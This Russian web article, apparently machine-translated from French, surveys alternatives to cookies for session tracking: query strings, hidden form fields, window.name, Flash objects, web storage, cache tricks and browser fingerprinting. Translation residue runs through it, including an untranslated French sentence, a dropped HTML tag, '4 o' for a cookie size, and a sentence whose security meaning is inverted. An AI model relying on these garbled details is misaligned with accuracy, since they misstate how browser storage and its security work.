Строки запроса, используемые для этой цели, и файлы cookie очень похожи: обе представляют собой информацию, произвольно выбранную сервером и возвращаемую браузером. Однако есть некоторые отличия: при повторном использовании URL-адреса, содержащего строку запроса, на сервер отправляется одна и та же информация. Например, если предпочтения пользователя закодированы в строке запроса URL-адреса, и пользователь отправляет этот URL-адрес другому пользователю по электронной почте, этот пользователь также сможет использовать эти предпочтения.

С другой стороны, когда пользователь обращается к одной и той же странице дважды, нет гарантии, что одна и та же строка запроса будет использована оба раза. Например, если пользователь попадает на страницу со страницы внутреннего сайта в первый раз и попадает на ту же страницу с внешней страницы во второй раз, строка запроса, относящаяся к странице сайта, обычно отличается, а файлы cookie — одни и те же. .

Другие недостатки строк запроса связаны с безопасностью: хранение данных, идентифицирующих сеанс, в строках запроса позволяет или упрощает атаки фиксации сеанса, атаки со ссылками на идентификаторы и другие эксплойты. Передача идентификаторов сеанса в виде файлов cookie HTTP более безопасна.

Скрытое поле формы

Одна из форм отслеживания сеансов, используемая ASP.NET, заключается в использовании веб-форм со скрытыми полями. Этот метод очень похож на использование строк запроса URL для передачи информации и имеет те же преимущества и недостатки; и если форма обрабатывается с помощью метода HTTP GET, поля фактически становятся частью URL-адреса браузера, который отправит его при отправке формы. Но большинство форм обрабатываются с помощью HTTP POST, что приводит к тому, что информация формы, включая скрытые поля, добавляется в качестве дополнительных входных данных, которые не являются ни частью URL, ни файлом cookie.

Этот подход имеет два преимущества с точки зрения отслеживания: во-первых, отслеживание информации, размещенной в исходном коде HTML и вводе POST, а не URL-адресе, позволит обычному пользователю избежать этого отслеживания; во-вторых, информация о сеансе не копируется, когда пользователь копирует URL-адрес (например, чтобы сохранить страницу на диск или отправить ее по электронной почте).

окно.имя

Все распространенные веб-браузеры могут хранить довольно большой объем данных (от 2 МБ до 32 МБ) с помощью JavaScript, используя свойство DOM window.name. Эти данные можно использовать вместо файлов cookie сеанса, а также они используются в разных доменах. Этот метод можно сочетать с объектами JSON для хранения сложного набора переменных сеанса на стороне клиента.

Недостатком является то, что каждое отдельное окно или вкладка изначально будет иметь пустое имя окна; при просмотре по вкладкам (открытым пользователем) это означает, что вкладки, открытые по отдельности, не будут иметь имени окна. Кроме того, window.name можно использовать для отслеживания посетителей на разных сайтах, что может создать проблему конфиденциальности.

В некоторых отношениях это может быть более безопасным, чем куки-файлы, из-за невмешательства сервера, что делает его неуязвимым для сетевой атаки снифферных куки-файлов. Однако, если принять специальные меры для защиты данных, они уязвимы для дальнейших атак, так как данные доступны через другие сайты, открытые в том же окне.

HTTP-аутентификация

Протокол HTTP включает базовые протоколы аутентификации доступа и дайджест аутентификации доступа, который разрешает доступ к веб-странице только в том случае, если пользователь ввел имя пользователя и пароль. Если сервер запрашивает сертификат для предоставления доступа к веб-странице, браузер запрашивает его у пользователя и после получения сохраняет его и отправляет во всех последующих HTTP-запросах. Эта информация может быть использована для отслеживания пользователя.

Локальный общий объект

Если браузер включает подключаемый модуль Adobe Flash Player, локальные общие объекты могут использоваться для тех же целей, что и файлы cookie. Они могут быть привлекательным выбором для веб-разработчиков, потому что:

  • ограничение размера по умолчанию для локального общего объекта составляет 100 КБ;
  • проверки безопасности отделены от проверок файлов cookie пользователя (поэтому локальные общие объекты могут быть разрешены, когда файлы cookie не разрешены).

Этот последний пункт отличает политику управления файлами cookie от политики локальных общих объектов Adobe. вызывает вопросы относительно управления пользователем своими настройками конфиденциальности: он должен знать, что его управление файлами cookie не влияет на управление локальными общими объектами, и наоборот.

Еще одна критика этой системы заключается в том, что ее можно использовать только через плагин Adobe Flash Player, который является проприетарным, а не веб-стандартом.

Постоянство на стороне клиента

Некоторые веб-браузеры поддерживают механизм сохранения на основе скриптов, который позволяет странице хранить информацию локально для последующего использования. Internet Explorer, например, поддерживает постоянную информацию в истории браузера, закладках, в формате, сохраненном в XML, или непосредственно с веб-страницей, сохраненной на диске. Для Microsoft Internet Explorer 5 существует метод пользовательских данных, доступный через поведение DHTML.

W3C представил в HTML 5 новый JavaScript API для хранения данных на стороне клиента, называемый веб-хранилищем, и направленный на постоянную замену файлов cookie. Он похож на файлы cookie, но имеет значительно большую емкость и не сохраняет информацию в заголовке HTTP-запроса. API допускает два типа веб-хранилища: локальное хранилище и хранилище сеансов, аналогичные постоянным файлам cookie и файлам cookie сеанса (за исключением того, что файлы cookie сеанса истекают при закрытии браузера во время работы). хранение сессий истекает при закрытии вкладки) соответственно. Веб-хранилище поддерживается Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 и Opera 10.50.

Другой механизм обычно основан на кэшировании браузера (в памяти, а не на обновлении) с использованием программ JavaScript на веб-страницах. 

Например, страница может содержать тег . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

В этот момент программа остается в кэш-памяти и посещенная страница не перезагружается во второй раз. Следовательно, если программа содержит глобальную переменную (например, var id = 3243242;), этот идентификатор остается действительным и может использоваться другим кодом JavaScript после повторной загрузки страницы или после загрузки страницы, ссылающейся на программу. 

Основным недостатком этого метода является то, что глобальная переменная JavaScript должна быть статической, то есть ее нельзя изменить или удалить, как файл cookie.

отпечаток пальца веб-браузера

Отпечаток браузера — это информация, собранная о настройках конфигурации браузера в целях идентификации. Эти отпечатки пальцев можно использовать для полной или частичной идентификации пользователя Интернета или устройства, даже если файлы cookie отключены.

Базовая информация о конфигурации веб-браузера уже давно собирается службами просмотра веб-сайтов с целью точного измерения веб-трафика и обнаружения различных форм мошенничества с кликами. С помощью языков сценариев на стороне клиента сбор гораздо более точной информации теперь возможно.

Преобразование этой информации в битовую строку создает отпечаток устройства. В 2010 году организация Electronic Frontier Foundation (EFF) измерила энтропию отпечатка пальца браузера как минимум 18,1 биты, и это было до того, как достижения в области снятия отпечатков пальцев холста добавили к этой энтропии 5,7 бита.

Коротко о печенье

Файлы cookie — это небольшие текстовые файлы, сохраняемые веб-браузером на жестком диске посетителя веб-сайта и используемые (среди прочего) для записи информации о посетителе или его перемещении по сайту. Таким образом, веб-мастер может распознавать привычки посетителя и персонализировать представление своего сайта для каждого посетителя; файлы cookie затем позволяют запомнить, сколько статей отображать на главной странице, или даже сохранить учетные данные для входа в систему для любой частной стороны: когда посетитель возвращается на сайт, ему больше не нужно вводить свое имя и пароль для быть распознаны, так как они автоматически считываются в файле cookie.

Файл cookie имеет ограниченный срок жизни, установленный разработчиком сайта. Также они могут истечь в конце сеанса на сайте, что соответствует закрытию браузера. Файлы cookie широко используются для облегчения жизни посетителей и предоставления им более актуальной информации. Но специальные методики позволяют следить за посетителем на нескольких сайтах и ​​таким образом собирать и перепроверять очень обширную информацию о его привычках. Этот метод придал использованию файлов cookie репутацию метода наблюдения, нарушающего конфиденциальность посетителей, что, к сожалению, соответствует действительности во многих случаях использования не по техническим причинам или неуважительно к ожиданиям пользователей.

В ответ на эти законные опасения в HTML 5 представлен новый API JavaScript для хранения данных на стороне клиента, называемый веб-хранилищем, который гораздо более безопасен и обладает большей емкостью и призван заменить файлы cookie.

Хранение файлов cookie

В некоторых браузерах cookie легко редактируется, достаточно простого текстового редактора, такого как Блокнот, чтобы изменить его значения вручную.

Файлы cookie сохраняются по-разному в зависимости от браузера:

  • Microsoft Internet Explorer сохраняет каждый файл cookie в отдельном файле;
  • Mozilla Firefox сохраняет все свои файлы cookie в одном файле;
  • Opera сохраняет все свои файлы cookie в одном файле и шифрует их (их невозможно изменить, кроме как в настройках программного обеспечения);
  • Apple Safari сохраняет все свои файлы cookie в одном файле с расширением .plist. Модификация возможна, но не очень проста, если только вы не изучите параметры программного обеспечения.

Браузеры должны поддерживать минимумы :

  • 300 одновременных файлов cookie;
  • 4 o за куки;
  • 20 файлов cookie на хост или домен.
[Общее: 0 В среднем: 0]

Написано Редакторы обзоров

Команда опытных редакторов тратит свое время на изучение продуктов, выполнение практических тестов, интервьюирование профессионалов отрасли, изучение отзывов потребителей и составление всех наших результатов в виде понятных и исчерпывающих резюме.

Оставить комментарий

Ваш электронный адрес не будет опубликован. Обязательные для заполнения поля помечены *

Как вы думаете?

384 Балы
Upvote Downvote